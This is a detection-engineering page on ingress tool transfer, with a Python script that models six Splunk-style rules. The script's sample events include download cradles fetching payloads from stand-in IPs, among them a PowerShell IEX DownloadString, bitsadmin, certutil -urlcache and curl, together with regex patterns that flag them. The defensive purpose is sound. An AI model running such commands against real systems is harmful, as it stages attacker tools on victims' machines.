
Description

Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external, adversary-controlled system through the command and control channel to bring tools into the victim network, or through alternate protocols with another tool such as FTP.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Endpoint
  • Last Updated: 2021-03-24
  • Author: Michael Haag, Splunk
  • ID: b3782036-8cbd-11eb-9d8e-acde48001122

Narrative

Ingress tool transfer is a technique under the Command and Control tactic. Behaviors include the use of living-off-the-land binaries to download implants or other binaries, sometimes over alternate communication ports. It is imperative to baseline applications on endpoints to understand which of them generate network activity, to where, and what their native behavior looks like. When abused, these utilities will write files to disk, often in world-writable paths.

During triage, review the reputation of the remote public destination IP or domain. Capture any files written to disk and analyze them. Review other parallel processes for additional behaviors.

Detections

Name                                                   | Technique                          | Type
Any Powershell DownloadFile                            | PowerShell                         | TTP
Any Powershell DownloadString                          | PowerShell                         | TTP
BITSAdmin Download File                                | BITS Jobs, Ingress Tool Transfer   | TTP
CertUtil Download With URLCache and Split Arguments    | Ingress Tool Transfer              | TTP
CertUtil Download With VerifyCtl and Split Arguments   | Ingress Tool Transfer              | TTP
Suspicious Curl Network Connection                     | Ingress Tool Transfer              | TTP
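The following is an added, offline illustration of what the six detections above look for and of the triage steps the narrative calls for; it is not the Splunk searches themselves and not code from the Splunk security content project. Each rule is approximated as a binary name plus a regular expression over the command line (the "split arguments" in the CertUtil names refer to the `-split` flag, so the pattern requires `-urlcache`/`-verifyctl` together with `-split`). The events, the exact regexes, and the list of commonly user-writable staging directories are assumptions made for the example; tune them to your own endpoint baseline.

```python
import re
from dataclasses import dataclass

# Constructed sample process-creation events using Endpoint.Processes-style
# field names (not real telemetry). The first six should each fire one rule;
# the last two are benign uses of the same binaries and must stay quiet.
SAMPLE_EVENTS = [
    {"dest": "ws01", "user": "jdoe", "process_name": "powershell.exe",
     "process": "powershell.exe -nop -w hidden -c \"(New-Object Net.WebClient)"
                ".DownloadFile('http://198.51.100.7/up.exe','C:\\Users\\Public\\up.exe')\""},
    {"dest": "ws02", "user": "jdoe", "process_name": "powershell.exe",
     "process": "powershell -c \"IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/s.ps1')\""},
    {"dest": "ws03", "user": "svc", "process_name": "bitsadmin.exe",
     "process": "bitsadmin.exe /transfer job1 /download /priority normal "
                "http://203.0.113.9/t.dll C:\\Windows\\Temp\\t.dll"},
    {"dest": "ws04", "user": "jdoe", "process_name": "certutil.exe",
     "process": "certutil.exe -urlcache -split -f http://203.0.113.9/a.exe C:\\ProgramData\\a.exe"},
    {"dest": "ws05", "user": "jdoe", "process_name": "certutil.exe",
     "process": "certutil.exe -VerifyCtl -split -f http://203.0.113.9/b.exe"},
    {"dest": "mac01", "user": "jdoe", "process_name": "curl",
     "process": "curl -s http://203.0.113.9/run.sh -o /tmp/run.sh"},
    {"dest": "ws06", "user": "admin", "process_name": "certutil.exe",
     "process": "certutil.exe -hashfile C:\\tools\\x.zip SHA256"},
    {"dest": "ws07", "user": "admin", "process_name": "powershell.exe",
     "process": "powershell.exe Get-Process"},
]

# Illustrative approximations of the six detections on this page (assumed
# patterns, not the published Splunk searches): accepted binaries (process_name
# without .exe) and a regex applied to the lower-cased command line.
RULES = [
    ("Any Powershell DownloadFile", ("powershell", "pwsh"), r"\.downloadfile\("),
    ("Any Powershell DownloadString", ("powershell", "pwsh"), r"\.downloadstring\("),
    ("BITSAdmin Download File", ("bitsadmin",), r"/transfer\b"),
    ("CertUtil Download With URLCache and Split Arguments", ("certutil",), r"-urlcache\b.*-split\b"),
    ("CertUtil Download With VerifyCtl and Split Arguments", ("certutil",), r"-verifyctl\b.*-split\b"),
    ("Suspicious Curl Network Connection", ("curl",), r"(?=.*\s-s\b)(?=.*\s-o\b)"),
]

URL_RE = re.compile(r"https?://[^\s'\"]+", re.IGNORECASE)
WIN_PATH_RE = re.compile(r"[A-Za-z]:\\[^\s'\",)]+")
POSIX_PATH_RE = re.compile(r"(?<![\w:/])/(?:tmp|var/tmp|dev/shm)/[^\s'\",)]+")
# Staging directories any local user can normally write to (assumption: replace
# with the paths your own baseline treats as world-writable).
WRITABLE_PREFIXES = ("c:\\users\\public", "c:\\windows\\temp", "c:\\programdata",
                     "/tmp/", "/var/tmp/", "/dev/shm/")


@dataclass
class Alert:
    rule: str
    dest: str
    user: str
    process: str
    urls: list          # remote sources to check for reputation
    drop_paths: list    # local files to capture for analysis
    writable_drop: bool  # True if a drop path sits in a world-writable directory


def triage(cmdline: str):
    """Extract the remote URL(s) and local destination path(s) from a command
    line so the analyst can review the destination and collect the file."""
    urls = URL_RE.findall(cmdline)
    paths = WIN_PATH_RE.findall(cmdline) + POSIX_PATH_RE.findall(cmdline)
    writable = any(p.lower().startswith(WRITABLE_PREFIXES) for p in paths)
    return urls, paths, writable


def evaluate(events):
    """Run every rule over every event; one Alert per (event, rule) match."""
    alerts = []
    for ev in events:
        name = ev["process_name"].lower().removesuffix(".exe")
        cmd = ev["process"]
        for rule, binaries, pattern in RULES:
            if name in binaries and re.search(pattern, cmd.lower()):
                urls, paths, writable = triage(cmd)
                alerts.append(Alert(rule, ev["dest"], ev["user"], cmd, urls, paths, writable))
    return alerts


if __name__ == "__main__":
    for a in evaluate(SAMPLE_EVENTS):
        print(f"[{a.rule}] {a.dest}/{a.user} urls={a.urls} "
              f"drop={a.drop_paths} writable_drop={a.writable_drop}")
```

The `certutil -hashfile` and `Get-Process` events show why the rules key on the download-specific arguments rather than on the binary alone: the same utilities are common in legitimate administration, which is exactly why the narrative insists on baselining them first. The `writable_drop` flag surfaces the world-writable staging behavior the narrative describes so those alerts can be prioritized for file capture.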

Reference

source | version: 1